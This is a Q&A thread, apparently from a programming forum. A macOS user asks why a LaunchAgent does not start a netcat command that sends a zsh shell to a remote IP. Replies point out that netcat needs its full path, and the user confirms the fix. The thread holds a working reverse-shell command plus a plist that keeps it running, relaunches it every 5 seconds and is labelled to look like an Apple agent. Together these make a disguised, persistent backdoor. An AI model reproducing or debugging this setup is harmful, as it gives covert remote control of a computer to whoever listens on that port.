# Launchctl does not start netcat shell

Tags: bash, macos, shell, netcat, launchctl

I have a script as shown saved to file /Users/yulkytulky/Library/demo/demo:

```
netcat 192.168.1.191 12345 -e /bin/zsh
```

And have created a LaunchAgent plist file so that the shell auto-runs like so:

```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
        <key>Label</key>
        <string>com.apple.demo</string>
        <key>RunAtLoad</key>
        <true/>
        <key>KeepAlive</key>
        <true/>
        <key>ProgramArguments</key>
        <array>
          <string>/bin/sh</string>
          <string>/Users/yulkytulky/Library/demo/demo</string>
        </array>
        <key>StartInterval</key>
        <integer>5</integer>
</dict>
</plist>
```

However, no shell is spawned when I listen.

I tested changing the script to

```
say hello
```

and it worked! (said hello every 5 seconds)

Why does it not work when I attempt to run netcat?

NOTE: I know the script is executable. I can even copy the path to the script from the plist file, paste it into a terminal, and it works as expected.

Comment: double-check the path to `netcat` (you can do this using `which netcat` from the shell).  `say` is in `/usr/bin/` and thus is commonly in the standard paths, but if your `netcat` executable is elsewhere, you may need to provide full pathspec for it.

Comment: @gaige Thanks so much! What a silly mistake by me ... it was stored in /usr/local/bin/netcat

Answer (score 0):

Double-check the path to `netcat` (you can do this using `which netcat` from the shell). `say` is in `/usr/bin/` and thus is commonly in the standard paths, but if your `netcat` executable is elsewhere, you may need to provide full pathspec for it